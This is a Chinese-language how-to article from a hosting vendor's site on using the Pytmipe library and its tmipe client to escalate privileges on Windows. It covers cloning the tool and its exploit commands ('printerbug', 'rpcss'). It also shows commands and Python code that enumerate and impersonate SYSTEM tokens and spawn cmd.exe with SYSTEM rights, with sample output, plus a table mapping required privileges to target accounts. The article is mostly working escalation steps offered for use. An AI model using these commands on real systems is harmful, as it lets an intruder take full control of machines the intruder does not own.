溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
本篇內容介紹了“怎么使用Pytmipe實現Windows上的令牌篡改和提權”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!
PYTMIPE (通過令牌篡改和偽造實現提權的Python庫)是一個Python 3庫,支持在Windows系統中實現令牌篡改和模擬,最終實現權限提升。TMIPE則是一個Python 3客戶端,它主要使用的就是pytmipe庫。
一個Python客戶端:tmipe(python3 tmipe.py);
一個Python庫:pytmipe,用于將該項目與其他項目整合;
Pytinstaller樣例,用于獲取可執行文件;
方法 | 需要的權限 | 操作系統(未包含全部) | 直接目標(最佳效果) |
令牌創建&偽造 | 用戶名& 密碼 | All | local administrator |
令牌偽造&竊取 | SeDebugPrivilege | All | nt authority\system |
父PID嗅探(句柄繼承) | SeDebugPrivilege | >= Vista | nt authority\system |
服務(SCM) | 本地管理員 | All | nt authority\system or domain account |
WMI 事件 | 本地管理員 | All | nt authority\system |
? 指針漏洞 ? LPE | SeImpersonatePrivilege (Service 賬號) | Windows 8.1, 10 & Server 2012R2/2016/2019 | nt authority\system |
RPCSS 服務LPE | SeImpersonatePrivilege (Service 賬號) | Windows 10 & Server 2016/2019 | nt authority\system |
ctypes使用的情況非常多,pywin32的很多功能都已經整合進了pytmipe,以獲得更好的可移植性。但是,目前由于時間緊任務中,任務調度程序模塊仍然使用pywin32(更確切地說是pythoncom)。所有其他模塊僅使用ctypes。
廣大研究人員可以使用下列命令將該項目源碼克隆至本地:
git clone https://github.com/quentinhardy/pytmipe.git
針對python客戶端(tmipe):
python.exe tmipe.py -h
usage: tmipe.py [-h] [--version]
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
...
**
888888 8b d8 88 88""Yb 888888
88 88b d88 88 88__dP 88__
88 88YbdP88 88 88""" 88""
88 88 YY 88 88 88 888888
-------------------------------------------
Token Manipulation, Impersonation and
Privilege Escalation (Tool)
-------------------------------------------
By Quentin HARDY (quentin.hardy@protonmail.com)
positional arguments:
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
Choose a main command
cangetadmin Check if user can get admin access
printalltokens Print all tokens accessible from current thread
printalltokensbyname
Print all tokens accessible from current thread by account name
printalltokensbypid Print all tokens accessible from current thread by pid
printsystemtokens Print all system tokens accessible from current
searchimpfirstsystem
search and impersonate first system token
imppid impersonate primary token of selected pid and try to spawn cmd.exe
imptoken impersonate primary or impersonation token of selected pid/handle and try to spawn cmd.exe
printerbug exploit the "printer bug" for getting system shell
rpcss exploit "rpcss" for getting system shell
spoof parent PID Spoofing ("handle inheritance)"
impuser create process with creds with impersonation
runas create process with creds as runas
scm create process with Service Control Manager
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit針對python庫(pytmipe),可以直接查看源碼和樣本,這些我已經提供了非常詳細的文檔以供參考。
針對pyinstaller樣本和可執行文件,請查看該項目的src/examples/文件夾。
如需偽造第一個system令牌,并以system權限打開cmd.exe(使用python客戶端-tmipe):
python.exe tmipe.py searchimpfirstsystem -vv
我們也可以直接使用pytmipe庫來進行相同操作:
from impersonate import Impersonate from utils import configureLogging configureLogging() imp = Impersonate() imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)
獲取當前進程中的主令牌:
python.exe tmipe.py printalltokens --current --full --linked
輸出:
- PID: 3212
------------------------------
- PID: 3212
- type: Primary (1)
- token: 764
- hval: None
- ihandle: None
- sid: S-1-5-18
- accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
- intlvl: System
- owner: S-1-5-32-544
- Groups:
- S-1-5-32-544: {'Name': 'Administrators', 'Domain': 'BUILTIN', 'type': 4} (ENABLED, ENABLED_BY_DEFAULT, OWNER)
- S-1-1-0: {'Name': 'Everyone', 'Domain': '', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
- S-1-5-11: {'Name': 'Authenticated Users', 'Domain': 'NT AUTHORITY', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
- S-1-16-16384: {'Name': 'System Mandatory Level', 'Domain': 'Mandatory Label', 'type': 10} (INTEGRITY_ENABLED, INTEGRITY)
- Privileges (User Rights):
- SeAssignPrimaryTokenPrivilege: Enabled
[...]
- SeTrustedCredManAccessPrivilege: Enabled
- issystem: True
- sessionID: 1
- elevationtype: Default (1)
- iselevated: True
- Linked Token: None
- tokensource: b'*SYSTEM*'
- primarysidgroup: S-1-5-18
- isrestricted: False
- hasrestricitions: True
- Default DACL:
- {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0x10000000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-18'}
- {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0xa0020000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-32-544'}
[...]
- Mandatory Policy: NO_WRITE_UP如需從當前線程獲取所有的令牌,可以使用下列命令:
python.exe tmipe.py printalltokensbypid --imp-only
輸出:
[...] - PID 4276: - S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True) - PID 7252: - None - PID 1660: - S-1-5-21-28624056-3392308708-440876048-1106: DOMAIN\USER (possible imp: True) - S-1-5-20: NT AUTHORITY\NETWORK SERVICE (possible imp: True) - S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True) - S-1-5-90-0-1: Window Manager\DWM-1 (possible imp: True) - S-1-5-19: NT AUTHORITY\LOCAL SERVICE (possible imp: True) [...]
如果想要使用pytmipe庫來實現這個操作,也非常簡單:
from impersonate import Impersonate from utils import configureLogging configureLogging() imp = Impersonate() imp.printAllTokensAccessible(targetPID=None, printFull=True, printLinked=True, _useThreadMethod=False)
我們可以選擇一個令牌進行偽造。第一步,根據我們的過濾器獲取所有的令牌:
python.exe tmipe.py printalltokens --filter {\"sid\":\"S-1-5-18\",\"canimpersonate\":true}輸出:
[...]
- PID: 2288
------------------------------
- PID: 2288
- type: Impersonation (2)
- token: 2504
- ihandle: 118
- sid: S-1-5-18
- accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
- intlvl: System
- owner: S-1-5-18
- issystem: True
- elevationtype: Default (1)
- iselevated: True
- linkedtoken: None
- implevel: Impersonate (2)
- appcontainertoken: False
[...]
- primarysidgroup: S-1-5-18
- isrestricted: False
- hasrestricitions: True
- Mandatory Policy: VALID_MASK
- canimpersonate: True
[...]輸出結果顯示,偽造的令牌位于PID 2288,該令牌具有完整性級別系統。可以使用以下命令偽造此特定令牌:
python.exe tmipe.py imptoken --pid 2288 --ihandle 118 -vv
這條命令將以nt authority\system權限打開cmd.exe。我們也可以使用pytmipe庫來實現相同的效果,下面的源代碼能夠偽造第一個可用的system令牌,并打印有效令牌:
from impersonate import Impersonate
from windef import TokenImpersonation
allTokens = imp.getTokensAccessibleFilter(targetPID=None,
filter={'canimpersonate':True, 'sid':'S-1-5-18', 'type':TokenImpersonation},
_useThreadMethod=False)
if allTokens == {} or allTokens==None:
print("No one token found for impersonation")
else:
pid = list(allTokens.keys())[0] #use the first token of the first pid returned in 'allTokens'
firstIHandle = allTokens[pid][0]['ihandle']
imp.printThisToken(allTokens, pid, firstIHandle)
imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
print("Current Effective token for current thread after impersonation:")
imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
imp.terminateImpersonation()
print("Current Effective token for current thread (impersonation finished):")
imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)“怎么使用Pytmipe實現Windows上的令牌篡改和提權”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站,小編將為大家輸出更多高質量的實用文章!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
